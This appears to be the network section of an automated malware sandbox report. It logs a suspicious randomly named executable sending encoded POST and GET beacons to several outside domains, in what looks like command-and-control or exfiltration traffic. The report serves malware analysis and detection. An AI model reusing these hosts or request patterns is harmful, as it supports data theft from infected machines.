                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 68 32 50 74 39 3d 34 62 35 4d 71 76 49 65 6c 41 38 79 65 53 57 4b 44 50 52 49 64 48 65 73 4e 56 35 58 55 72 70 42 54 4a 36 53 54 5a 37 4f 71 56 6c 45 54 30 61 50 34 64 51 47 78 79 4a 38 59 61 6c 31 79 6f 6d 70 2f 72 7a 67 6b 43 6f 43 43 57 56 75 71 52 39 6c 78 47 52 71 43 76 35 37 48 68 35 49 76 6b 35 53 6a 30 6d 44 5a 44 75 65 72 2f 75 6a 76 75 34 7a 6b 62 36 51 5a 69 38 3d 26 34 52 4c 68 73 3d 37 42 4a 4c 4d 34 65 48 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?h2Pt9=4b5MqvIelA8yeSWKDPRIdHesNV5XUrpBTJ6STZ7OqVlET0aP4dQGxyJ8Yal1yomp/rzgkCoCCWVuqR9lxGRqCv57Hh5Ivk5Sj0mDZDuer/ujvu4zkb6QZi8=&4RLhs=7BJLM4eH"}</script></head></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  13192.168.2.4558223.33.130.190805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:31:03.167507887 CEST783OUTPOST /p8sm/ HTTP/1.1
                                  Host: www.inspireplay.live
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.inspireplay.live
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 202
                                  Referer: http://www.inspireplay.live/p8sm/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Raw: 68 32 50 74 39 3d 74 73 31 52 55 73 37 50 73 74 55 37 43 6e 46 67 30 30 47 33 36 48 34 75 62 32 43 4b 45 77 30 4b 43 6f 62 46 42 5a 45 48 38 43 70 66 6e 51 6f 69 71 59 5a 30 6e 6e 2f 77 6c 31 42 34 4b 57 44 57 36 71 32 2b 69 63 77 66 4d 54 49 78 75 66 31 6d 6a 79 44 59 46 50 32 6e 6b 65 70 50 75 4d 70 54 42 4b 35 55 78 59 76 71 4f 4b 63 72 77 4c 58 4f 73 42 46 47 4c 6c 6d 37 49 52 6e 6b 52 33 77 2f 32 76 49 55 68 76 52 5a 73 64 47 66 77 65 38 72 63 77 43 6d 4a 62 61 71 51 4b 57 43 75 7a 2b 67 77 6b 51 30 61 6b 58 7a 43 45 75 34 61 44 59 74 34 4d 31 36 73 75 67 54 44 2b 43 6a 6b 46 30 39 71 67 3d 3d
                                  Data Ascii: h2Pt9=ts1RUs7PstU7CnFg00G36H4ub2CKEw0KCobFBZEH8CpfnQoiqYZ0nn/wl1B4KWDW6q2+icwfMTIxuf1mjyDYFP2nkepPuMpTBK5UxYvqOKcrwLXOsBFGLlm7IRnkR3w/2vIUhvRZsdGfwe8rcwCmJbaqQKWCuz+gwkQ0akXzCEu4aDYt4M16sugTD+CjkF09qg==


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  14192.168.2.4558233.33.130.190805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:31:05.729437113 CEST803OUTPOST /p8sm/ HTTP/1.1
                                  Host: www.inspireplay.live
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.inspireplay.live
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 222
                                  Referer: http://www.inspireplay.live/p8sm/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Raw: 68 32 50 74 39 3d 74 73 31 52 55 73 37 50 73 74 55 37 42 48 56 67 79 56 47 33 34 6e 34 70 55 57 43 4b 4f 51 30 47 43 6f 48 46 42 62 6f 58 38 77 4e 66 6d 77 59 69 72 64 35 30 71 48 2f 77 75 56 41 7a 55 6d 44 4e 36 71 4c 4a 69 5a 49 66 4d 54 4d 78 75 65 46 6d 6a 68 72 62 48 66 32 70 78 75 70 4a 71 4d 70 54 42 4b 35 55 78 59 71 42 4f 4b 55 72 78 2f 54 4f 2b 30 70 46 43 46 6d 6b 43 78 6e 6b 56 33 77 37 32 76 4a 78 68 75 4d 43 73 62 4b 66 77 65 4d 72 63 69 36 6e 44 62 61 73 55 4b 57 53 68 69 48 56 79 52 30 2b 56 30 50 49 41 6e 6d 6c 53 6c 4a 33 70 39 55 74 2b 75 45 67 65 35 4c 58 70 47 4a 30 78 76 61 4d 31 72 30 43 30 4d 58 62 56 36 49 4a 31 62 61 59 65 6b 41 3d
                                  Data Ascii: h2Pt9=ts1RUs7PstU7BHVgyVG34n4pUWCKOQ0GCoHFBboX8wNfmwYird50qH/wuVAzUmDN6qLJiZIfMTMxueFmjhrbHf2pxupJqMpTBK5UxYqBOKUrx/TO+0pFCFmkCxnkV3w72vJxhuMCsbKfweMrci6nDbasUKWShiHVyR0+V0PIAnmlSlJ3p9Ut+uEge5LXpGJ0xvaM1r0C0MXbV6IJ1baYekA=


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  15192.168.2.4558243.33.130.190805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:31:08.282540083 CEST10885OUTPOST /p8sm/ HTTP/1.1
                                  Host: www.inspireplay.live
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.inspireplay.live
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 10302
                                  Referer: http://www.inspireplay.live/p8sm/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Raw: 68 32 50 74 39 3d 74 73 31 52 55 73 37 50 73 74 55 37 42 48 56 67 79 56 47 33 34 6e 34 70 55 57 43 4b 4f 51 30 47 43 6f 48 46 42 62 6f 58 38 77 46 66 6e 44 51 69 71 37 78 30 72 48 2f 77 6e 31 42 30 55 6d 43 56 36 75 6e 46 69 5a 4d 50 4d 52 45 78 76 38 4e 6d 33 41 72 62 4e 66 32 70 75 2b 70 49 75 4d 70 47 42 4a 52 51 78 59 61 42 4f 4b 55 72 78 2b 6a 4f 38 68 46 46 4f 6c 6d 37 49 52 6e 67 52 33 78 73 32 76 41 4d 68 75 35 33 73 4c 71 66 78 2b 63 72 54 78 43 6e 50 62 61 75 54 4b 58 4e 68 6a 37 38 79 56 56 42 56 33 54 69 41 67 6d 6c 51 77 38 44 73 70 63 37 39 34 63 53 64 75 76 78 6e 56 70 59 2b 64 4b 58 38 5a 55 34 70 73 48 6c 58 37 74 65 74 70 6d 6c 49 77 4f 47 32 55 4c 6e 41 34 35 63 65 2f 59 57 55 75 4d 75 42 2f 6b 4b 79 38 6d 43 65 68 73 38 56 50 53 66 78 51 52 62 65 36 2b 35 51 70 6f 34 6f 44 73 43 31 74 6f 4f 4b 38 41 59 68 41 4c 49 4e 68 45 68 78 54 46 6e 76 2f 73 64 44 32 4f 47 2f 2b 6b 77 4b 78 37 64 76 65 78 72 7a 53 5a 77 58 5a 49 38 7a 35 72 4b 64 49 47 46 68 74 37 35 35 41 72 69 6a 72 30 4b [TRUNCATED]
                                  Data Ascii: h2Pt9=ts1RUs7PstU7BHVgyVG34n4pUWCKOQ0GCoHFBboX8wFfnDQiq7x0rH/wn1B0UmCV6unFiZMPMRExv8Nm3ArbNf2pu+pIuMpGBJRQxYaBOKUrx+jO8hFFOlm7IRngR3xs2vAMhu53sLqfx+crTxCnPbauTKXNhj78yVVBV3TiAgmlQw8Dspc794cSduvxnVpY+dKX8ZU4psHlX7tetpmlIwOG2ULnA45ce/YWUuMuB/kKy8mCehs8VPSfxQRbe6+5Qpo4oDsC1toOK8AYhALINhEhxTFnv/sdD2OG/+kwKx7dvexrzSZwXZI8z5rKdIGFht755Arijr0KbpviEmtFjQre+Jfe+OwnSXCDVAXySxeErPwbTPjsuc76sDZybYCEWTiYejiGrNI1C9fTOQGXuVmA6bIZ/+QXSppY0CWtgZzB/erZ1QI667UW7rTCLZV6WLj9KXpOGVlkBSS1ZDihNq7g4vCaa4Ce0OU8gkfhbNlZnHn3Qsl0iXgIGcl6FEoMURhvb1coa0Y3SMWLhI0emsqfBIFZkpMKHLixrkc0AFlT3MdSt/UWoQieB+WKp/QdLRHkEiLH7A28MZZBoqr91WOjZx22OUQ7RJDBT+cRlyBO8cpnGTP3yRs5hJe3RsUA4iDWTPKJpHRMAPN0w/+pZMm0aQBeW/SzuOdeUy/xRLwsS22lxqk8H6SemcwxBK4ug2PaugVBg6QP1t/egTK16B36ChZCBCyeBY06dL2Mk+Q1vF6V3QCm5tW9gbDAa+Ib9HmnGa8ofhirrlC/bdNjo+p9nKHRK3YgMqjZq8tVMWzQktmiJkAK3FAjp4jDwLSl55lfDo2LDXqMyR5jkBhZSS4vC5WIn6DmWcc3rnz1griGTEncxGwCR4lwo5uVbXS5qZYkwN/6y4VxHnp5u1dlvWDvf956CZzcALKc8ZVcVWu9nbWBX24KU2Y02CkgUsyt7iwwYVFYtuCh71CXM48jPRPtLUkCtnYLm4PULLHfNQC5F5 [TRUNCATED]


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  16192.168.2.4558253.33.130.190805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:31:10.822659969 CEST514OUTGET /p8sm/?h2Pt9=gudxXcfIjfM6RSgjlHSXwEEWc2+zEXg0KLmBWaNcxhhcux8g2aNs+kqO3FQMDVnLkpHMsugYGQwIm+gz0yjubt2jusNNuut2QLx2iafcYqdrxcPN6iJJGks=&4RLhs=7BJLM4eH HTTP/1.1
                                  Host: www.inspireplay.live
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Connection: close
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Sep 16, 2024 09:31:11.291126013 CEST396INHTTP/1.1 200 OK
                                  Server: openresty
                                  Date: Mon, 16 Sep 2024 07:31:11 GMT
                                  Content-Type: text/html
                                  Content-Length: 256
                                  Connection: close
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 68 32 50 74 39 3d 67 75 64 78 58 63 66 49 6a 66 4d 36 52 53 67 6a 6c 48 53 58 77 45 45 57 63 32 2b 7a 45 58 67 30 4b 4c 6d 42 57 61 4e 63 78 68 68 63 75 78 38 67 32 61 4e 73 2b 6b 71 4f 33 46 51 4d 44 56 6e 4c 6b 70 48 4d 73 75 67 59 47 51 77 49 6d 2b 67 7a 30 79 6a 75 62 74 32 6a 75 73 4e 4e 75 75 74 32 51 4c 78 32 69 61 66 63 59 71 64 72 78 63 50 4e 36 69 4a 4a 47 6b 73 3d 26 34 52 4c 68 73 3d 37 42 4a 4c 4d 34 65 48 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?h2Pt9=gudxXcfIjfM6RSgjlHSXwEEWc2+zEXg0KLmBWaNcxhhcux8g2aNs+kqO3FQMDVnLkpHMsugYGQwIm+gz0yjubt2jusNNuut2QLx2iafcYqdrxcPN6iJJGks=&4RLhs=7BJLM4eH"}</script></head></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  17192.168.2.455826156.242.132.82805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:31:16.951042891 CEST780OUTPOST /p2q3/ HTTP/1.1
                                  Host: www.shanhaiguan.net
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.shanhaiguan.net
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 202
                                  Referer: http://www.shanhaiguan.net/p2q3/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Raw: 68 32 50 74 39 3d 49 49 65 72 39 4b 71 63 55 43 74 63 6f 4f 63 6d 4b 66 4a 65 4f 64 2f 52 2f 70 6b 67 78 59 41 32 45 72 72 36 75 44 46 4a 57 2b 45 49 6c 51 73 52 38 4e 64 51 70 54 4b 59 44 53 7a 63 7a 65 50 6c 38 7a 48 42 65 71 64 30 69 2f 72 61 4c 47 30 74 34 48 59 75 64 79 6b 2b 38 6e 44 2f 34 4d 32 34 72 51 34 54 38 35 53 66 33 34 68 72 7a 54 75 4f 45 36 45 4d 4b 66 31 6b 63 4e 55 6c 63 78 4c 33 67 57 66 61 38 36 4f 72 50 43 66 46 67 37 6f 52 34 67 34 56 65 42 69 35 4d 53 37 4f 77 75 47 2b 48 79 35 48 34 34 7a 48 70 61 59 31 69 2b 6b 66 67 49 79 68 66 50 6b 63 4c 64 77 75 70 6e 52 4e 62 51 3d 3d
                                  Data Ascii: h2Pt9=IIer9KqcUCtcoOcmKfJeOd/R/pkgxYA2Err6uDFJW+EIlQsR8NdQpTKYDSzczePl8zHBeqd0i/raLG0t4HYudyk+8nD/4M24rQ4T85Sf34hrzTuOE6EMKf1kcNUlcxL3gWfa86OrPCfFg7oR4g4VeBi5MS7OwuG+Hy5H44zHpaY1i+kfgIyhfPkcLdwupnRNbQ==


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  18192.168.2.455827156.242.132.82805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:31:19.501806021 CEST800OUTPOST /p2q3/ HTTP/1.1
                                  Host: www.shanhaiguan.net
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.shanhaiguan.net
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 222
                                  Referer: http://www.shanhaiguan.net/p2q3/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Raw: 68 32 50 74 39 3d 49 49 65 72 39 4b 71 63 55 43 74 63 70 76 73 6d 48 63 52 65 4c 39 2f 53 38 70 6b 67 71 6f 41 79 45 72 33 36 75 47 70 6e 57 73 77 49 6c 78 63 52 37 4a 70 51 75 54 4b 59 62 43 7a 56 73 4f 50 51 38 7a 4b 2b 65 71 78 30 69 2f 76 61 4c 44 51 74 37 30 77 74 53 43 6b 34 6c 33 44 68 6c 38 32 34 72 51 34 54 38 35 47 35 33 34 35 72 7a 44 65 4f 56 72 45 50 4a 66 31 72 62 4e 55 6c 59 78 4c 7a 67 57 66 6b 38 37 53 4e 50 45 44 46 67 35 67 52 37 30 55 53 56 42 69 7a 44 79 36 37 2b 75 6a 75 48 58 77 76 34 5a 4f 6b 6e 49 6f 74 71 59 31 46 78 35 54 32 4e 50 41 76 57 61 35 61 6b 6b 73 45 41 5a 38 64 37 64 4a 35 75 41 47 43 39 4e 2b 36 6e 6b 31 32 4c 57 63 3d
                                  Data Ascii: h2Pt9=IIer9KqcUCtcpvsmHcReL9/S8pkgqoAyEr36uGpnWswIlxcR7JpQuTKYbCzVsOPQ8zK+eqx0i/vaLDQt70wtSCk4l3Dhl824rQ4T85G5345rzDeOVrEPJf1rbNUlYxLzgWfk87SNPEDFg5gR70USVBizDy67+ujuHXwv4ZOknIotqY1Fx5T2NPAvWa5akksEAZ8d7dJ5uAGC9N+6nk12LWc=


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  19192.168.2.455828156.242.132.82805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:31:22.048216105 CEST10882OUTPOST /p2q3/ HTTP/1.1
                                  Host: www.shanhaiguan.net
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.shanhaiguan.net
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 10302
                                  Referer: http://www.shanhaiguan.net/p2q3/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Raw: 68 32 50 74 39 3d 49 49 65 72 39 4b 71 63 55 43 74 63 70 76 73 6d 48 63 52 65 4c 39 2f 53 38 70 6b 67 71 6f 41 79 45 72 33 36 75 47 70 6e 57 73 6f 49 6c 44 55 52 39 75 31 51 76 54 4b 59 46 53 7a 51 73 4f 50 33 38 7a 53 36 65 71 74 6b 69 38 48 61 61 56 63 74 2b 42 4d 74 4a 53 6b 34 34 6e 44 38 34 4d 32 58 72 51 6f 58 38 35 57 35 33 34 35 72 7a 46 61 4f 56 36 45 50 47 2f 31 6b 63 4e 56 6b 63 78 4c 50 67 57 57 66 38 37 6d 37 4d 33 62 46 75 35 51 52 72 58 73 53 63 42 69 39 50 53 36 6a 2b 75 65 30 48 58 45 4e 34 5a 72 4c 6e 4c 30 74 6f 73 55 76 6d 5a 6e 4c 62 63 6f 69 41 6f 74 75 6c 6c 55 32 5a 72 39 70 33 73 46 2b 32 78 47 5a 37 66 44 53 32 55 52 4d 51 69 72 48 75 45 6c 62 68 43 78 33 6b 4e 4d 75 63 66 2b 35 30 34 46 59 35 34 57 48 36 6e 78 44 5a 42 37 6b 4d 64 39 50 57 6e 58 6c 58 4b 36 33 62 65 6e 5a 70 49 63 51 64 79 63 57 64 71 35 38 37 46 6c 4a 49 49 44 31 53 78 50 56 71 36 79 70 30 74 70 42 74 36 67 2f 53 37 4a 57 7a 68 72 49 69 50 53 59 78 61 75 76 77 36 41 50 30 56 48 46 71 63 4b 4e 41 75 45 4a [TRUNCATED]
                                  Data Ascii: h2Pt9=IIer9KqcUCtcpvsmHcReL9/S8pkgqoAyEr36uGpnWsoIlDUR9u1QvTKYFSzQsOP38zS6eqtki8HaaVct+BMtJSk44nD84M2XrQoX85W5345rzFaOV6EPG/1kcNVkcxLPgWWf87m7M3bFu5QRrXsScBi9PS6j+ue0HXEN4ZrLnL0tosUvmZnLbcoiAotullU2Zr9p3sF+2xGZ7fDS2URMQirHuElbhCx3kNMucf+504FY54WH6nxDZB7kMd9PWnXlXK63benZpIcQdycWdq587FlJIID1SxPVq6yp0tpBt6g/S7JWzhrIiPSYxauvw6AP0VHFqcKNAuEJhC8s7UiyNqii1in2H0SmpPHL9FFSl0zLa5zLFfyLJID2MC4gG+5j5IzGiYK79WV6x5ufpQUe4IOOkOY3bYoduACEe+4kWG5Ay+2zYyIpbGtYw5idcPDNpTwMxbmCmEQKMOtGwBN2gQ1pCpyamrN2BWWTp56qMe5zg68NvbS7UzMJfc2HJ5CuSsZE550AqRr2v0rOB7B3/U1Aw9xWbPcgfqmF2QbsT50f5atfqWYCy+i/om37bKt/FzLmAwfftGz3DF90tbAxYCdQ4EPKeUd8izajmj19+0I4y0RV2AO6fYe/QwKyK5L0FQk6i3HbQpK/f5xOd5Rg86o9ctxmEQW6GbIZiR6iDkUupUaF49cioTNx50qhs6ESCRjwjlfEHkbs+zGF/kzZ59W9Wy5NdWeFWhG+WqXttHDURp7Z4qszCiqCqookNPOEjdl2Cl1dPxnsrkG6F/O0YmZtzINVlJr1O680GRKt3xL7fXgge2A6O83Tlpe9ZPaFvamawprpSOr7KXNRTCVEKY8hAd5PbRANsOQLUePJgK45CKREymcHmVNCWiPjWZi8mUEgl2R4dUQLQSzIC2xfKIYBZ2uYfFnryPDmzlnvz8YxnF+F102dKvGveCF2Zh8bcN09G+w9e9RYi4Yv16ayrwzCKGUXQLNThMuTDP9sGaL2ed [TRUNCATED]


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  20192.168.2.455829156.242.132.82805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:31:24.588167906 CEST513OUTGET /p2q3/?h2Pt9=FK2L+8PIei1GuvtlS8gCO8fM4ZQmscEbBI34s0k1PsRmujAOjfMM4GbCZxnV6srYixPIeZB0oPqoKkF830AnIDgf70T/wPSZ3Q0Y3Iy42KJKjy26SpAoBvI=&4RLhs=7BJLM4eH HTTP/1.1
                                  Host: www.shanhaiguan.net
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Connection: close
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  21192.168.2.455830136.143.186.12805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:31:51.201567888 CEST774OUTPOST /ivo1/ HTTP/1.1
                                  Host: www.lanxuanz.tech
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.lanxuanz.tech
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 202
                                  Referer: http://www.lanxuanz.tech/ivo1/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Raw: 68 32 50 74 39 3d 53 4a 54 6c 46 64 39 4f 6e 32 36 32 48 6e 2f 51 76 64 37 69 4a 4b 4f 47 55 6c 55 50 79 59 56 51 2b 6d 6e 64 35 30 64 34 37 36 43 70 38 32 36 51 45 6e 76 4c 6b 65 47 39 45 75 46 61 4e 67 69 75 39 47 61 62 37 43 44 50 6a 41 67 4b 74 53 7a 4c 58 6a 62 58 2b 34 39 39 57 54 70 49 67 58 2f 2f 5a 76 61 70 38 57 4f 49 6e 74 48 74 65 50 6a 4d 53 2b 74 2f 68 30 4c 64 32 42 31 31 38 73 4e 59 79 73 30 5a 48 4d 70 38 4b 57 43 5a 64 4d 2f 4f 69 4c 76 6e 33 57 39 72 34 39 56 41 46 73 6c 45 44 30 7a 42 4f 4a 30 38 2b 65 2b 4a 5a 65 48 65 61 36 36 66 4f 53 4b 58 6b 6c 75 4e 4a 35 32 69 4c 51 3d 3d
                                  Data Ascii: h2Pt9=SJTlFd9On262Hn/Qvd7iJKOGUlUPyYVQ+mnd50d476Cp826QEnvLkeG9EuFaNgiu9Gab7CDPjAgKtSzLXjbX+499WTpIgX//Zvap8WOIntHtePjMS+t/h0Ld2B118sNYys0ZHMp8KWCZdM/OiLvn3W9r49VAFslED0zBOJ08+e+JZeHea66fOSKXkluNJ52iLQ==
                                  Sep 16, 2024 09:31:51.816766977 CEST1236INHTTP/1.1 404
                                  Server: ZGS
                                  Date: Mon, 16 Sep 2024 07:31:51 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: zalb_8ae64e9492=0f71d2b25c73f2883ce01c2fd3c97eb8; Path=/
                                  Set-Cookie: csrfc=08991024-0bb3-41ad-b15f-0150db8a73f8;path=/;priority=high
                                  Set-Cookie: _zcsr_tmp=08991024-0bb3-41ad-b15f-0150db8a73f8;path=/;SameSite=Strict;priority=high
                                  Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                  Pragma: no-cache
                                  Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                  vary: accept-encoding
                                  Content-Encoding: gzip
                                  Data Raw: 35 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 00 cd 58 5b 6f db 36 14 7e df af 60 15 b4 68 b1 28 92 25 2b 76 15 d9 c5 96 0c c5 9e 3a a0 03 86 0d 7b a1 25 ca 22 42 91 02 49 c7 4e 82 fd f7 1d 52 b2 ad 6b 93 f5 69 76 03 8b e2 b9 f1 7c df 39 24 9b bc b9 fb 72 fb fb 9f bf fd 82 0a 5d b2 f5 0f 49 fd 83 10 4a 0a 82 33 fb 64 06 25 d1 18 71 5c 92 95 23 c5 46 68 e5 a0 54 70 4d b8 5e 39 5c 50 9e 91 c3 25 e2 22 17 8c 89 bd 79 c2 32 2d e8 03 31 8f 8a d3 aa 22 da 41 de c9 9c a6 9a 91 f5 5f a2 10 89 57 3f 1f 67 18 e5 f7 48 3f 56 e0 48 93 83 f6 52 05 ae 24 61 2b 47 e9 47 46 54 41 8c a5 42 92 7c e5 78 7b b2 c9 21 0a f5 29 c7 25 65 8f ab 2f 15 e1 3f 7e c5 5c c5 73 df bf bc f6 7d e7 64 d7 6a 1f 47 f0 d9 88 ec f1 f9 3c 84 8f b1 e4 d6 86 62 c7 58 42 c6 92 73 89 14 fc b8 8a 48 9a df 0c 15 14 7d 22 f1 6c 56 1d ba 73 25 96 5b ca 63 1f de a3 ce 44 85 b3 8c f2 ed c8 cc 06 a7 f7 5b 29 76 3c 73 53 c1 84 8c 2f f2 c8 7c 5b 86 ff 39 3f 5e 69 51 dd 1a 31 f5 3c 61 25 46 6e 29 9e 5c 48 28 c1 d2 dd 4a 9c 51 80 eb 3d 23 b9 be 44 17 b9 3f [TRUNCATED]
                                  Data Ascii: 56fX[o6~`h(%+v:{%"BINRkiv|9$r]IJ3d%q\#FhTpM^9\P%"y2-1"A_W?gH?VHR$a+GGFTAB|x{!)%e/?~\s}djG<bXBsH}"lVs%[cD[)v<sS/|[9?^iQ1<a%Fn)\H(JQ=#D?_Euu,Xyo?LSt7Ba6%?DvL1)R{7V</fKOsN{vPc}0@J0|-NeNt$E+Ca^uK0gE,0][`Zn~.^D %cT,#|K1{Q;,1oz&j5#ZIdZA@OXU0_Qcq&?!S
